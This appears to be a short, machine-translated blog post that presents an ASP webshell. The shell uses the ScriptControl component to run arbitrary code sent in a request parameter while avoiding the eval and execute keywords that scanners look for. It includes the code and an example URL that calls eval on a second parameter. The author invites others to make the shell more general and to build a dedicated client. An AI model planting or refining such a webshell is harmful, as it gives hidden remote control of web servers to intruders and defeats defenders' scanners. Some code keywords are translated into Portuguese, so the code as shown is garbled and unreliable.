Sempre tive curiosidade, por que existe eval ou execute no cliente. Não importa onde eu me esconda, o administrador pode me dar uma surra usando qualquer scanner XX webshell. Hoje pesquisei novamente o componente ScriptControl em VB e descobri que ele também pode ser chamado em asp. Estudei o método e depois discuti com lcx. Recebi o seguinte código. Gostaria de agradecer aos meus idosos pela orientação, haha.
O código é muito simples, então não vou explicá-lo muito para evitar que alguém me repreenda por fingir.
Copie o código do código da seguinte forma:
<%
Definir o = Server.CreateObject(ScriptControl)
o.idioma = vbscript
o.addcode(Request(SubCode)) 'Parâmetro SubCode como código do processo
o.run e,Server,Response,Request,Application,Session,Error 'Chame-o com o nome do parâmetro e e envie 6 objetos base como parâmetros ao mesmo tempo
'Exemplo de chamada:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response .write%28server.mappath%28%22tmp.asp%22%29%29
%>
Observe que embora possa ser usado, o experimento descobriu que apenas o cliente lake2 pode ser usado. Espero que alguém possa sair e torná-lo mais geral. hehe. Também seria uma boa ideia escrever para seu próprio cliente dedicado.